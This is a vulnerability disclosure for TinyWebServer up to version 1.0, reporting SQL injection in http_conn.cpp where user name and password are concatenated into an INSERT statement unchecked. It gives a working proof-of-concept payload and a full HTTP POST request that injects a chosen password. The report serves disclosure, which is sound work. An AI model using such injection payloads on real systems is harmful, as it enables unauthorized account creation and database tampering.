BUG_Author: s0l42
Affected Version: TinyWebServer≤ 1.0
Vendor: TinyWebServer GitHub Repository
Software: TinyWebServer
Vulnerability Files:
http/http_conn.cpp:426-431A sql injection found in http/http_conn.cpp:426-431 of TinyWebServer ≤ 1.0, it use strcat to concat the user inputs name and password with sql statement insert without any check.
To proof the vulnerability, we input name and password as follows. If the user aaaa is inserted successfully and the password is 1 instead of 222, the vulnerability exists.
user=aaaa','1')#&password=222
POST /3CGISQL.cgi HTTP/1.1
Host: xxxx
Content-Length: 1015
Cache-Control: max-age=0
Origin: xxxx
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: xxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
user=aaaa','1')#&password=222
If success, a user aaaa created and password, 1, will be set.